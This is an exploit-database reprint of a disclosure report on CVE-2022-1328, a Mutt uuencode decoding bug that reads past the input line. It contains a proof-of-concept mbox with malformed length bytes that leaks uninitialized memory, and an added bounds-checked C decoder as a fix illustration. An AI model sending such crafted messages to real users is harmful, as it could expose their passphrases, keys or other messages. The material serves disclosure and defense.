Mutt mutt_decode_uuencoded() Memory Disclosure

CVE: CVE-2022-1328
Category: CWE-125
Price: $1000
Severity: Critical
Author: AbdulAziz Hariri
Risk: High
Exploitation Type: Local
Date: 2022-07-11
CVSS: CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070030

Below is a copy:

Mutt mutt_decode_uuencoded() Memory Disclosure
mutt: mutt_decode_uuencoded() can read past the end of the input line

In mutt_decode_uuencoded(), the line length is read from the untrusted uuencoded part without validation. This could result in including private memory in replies, for example fragments of other messages, passphrases or keys.

Reproduce with the following mbox (note that the <9f> lines are literal 0x9f bytes). This should show some uninitialized garbage in the message.

From taviso  Thu Mar 31 16:53:55 2022
From: taviso
Subject: mutt_decode_uuencoded test
Content-Disposition: inline
Content-Transfer-Encoding: x-uuencode
Content-Type: text/plain

begin 644 test
<9f>
M2&5L;&\L"@I)9B!Y;W4@87)E(')E861I;F<@=&AI<R!M97-S86=E(&EN(&UU
M='0L('1H92!N97AT(&QI;F4*<VAO=6QD(&-O;G1A:6X@9V%R8F%G92X*"@H*
<9f>
54&QE87-E(')E<&QY+`I4879I<RX*
`
end.



This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is YYYY-MM-DD.


Related CVE Numbers: CVE-2022-1328.



Found by: [email protected]
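
An added example, not part of the original report and not Mutt's code or its fix: a bounds-checked uuencode line decoder in C that performs the validation the report says is missing, comparing the length byte with the characters actually present on the line. The name uu_decode_line_checked and its signature are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* 6-bit value of one uuencode character ('`' and ' ' both mean 0). */
#define UU_VAL(c) ((unsigned)((c) - ' ') & 0x3f)
#define UU_OK(c)  ((unsigned char)(c) >= ' ' && (unsigned char)(c) <= '`')

/* Decode one uuencoded body line (hypothetical helper, not Mutt's API).
 * Returns the number of bytes written to out, or -1 if the line is malformed:
 * bad length byte, fewer characters than the length byte promises, a
 * character outside the uuencode alphabet, or out too small. */
int uu_decode_line_checked(const char *line, unsigned char *out, size_t outcap)
{
    size_t have = strcspn(line, "\r\n");   /* characters really on the line */
    if (have == 0 || !UU_OK(line[0]))
        return -1;                          /* e.g. a lone 0x9f byte */

    size_t declared = UU_VAL(line[0]);      /* untrusted byte count */
    size_t groups = (declared + 2) / 3;     /* 4 characters encode 3 bytes */
    if (groups * 4 > have - 1 || declared > outcap)
        return -1;                          /* decoding would pass the line end */

    const char *p = line + 1;
    size_t n = 0;
    for (size_t g = 0; g < groups; g++, p += 4) {
        if (!UU_OK(p[0]) || !UU_OK(p[1]) || !UU_OK(p[2]) || !UU_OK(p[3]))
            return -1;
        unsigned a = UU_VAL(p[0]), b = UU_VAL(p[1]);
        unsigned c = UU_VAL(p[2]), d = UU_VAL(p[3]);
        unsigned char tri[3] = { (unsigned char)((a << 2) | (b >> 4)),
                                 (unsigned char)((b << 4) | (c >> 2)),
                                 (unsigned char)((c << 6) | d) };
        for (int i = 0; i < 3 && n < declared; i++)
            out[n++] = tri[i];              /* never emit more than declared */
    }
    return (int)n;
}

int main(void)
{
    unsigned char buf[64];
    /* Inputs: the last body line of the mbox above, and a 0x9f-only line. */
    int good = uu_decode_line_checked("54&QE87-E(')E<&QY+`I4879I<RX*\n", buf, sizeof buf);
    int bad = uu_decode_line_checked("\x9f\n", buf, sizeof buf);
    printf("valid line: %d bytes, 0x9f line: %d\n", good, bad);
    return (good == 21 && bad == -1) ? 0 : 1;
}
```

A decoder with these checks rejects the 0x9f lines instead of emitting bytes that were never in the message.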
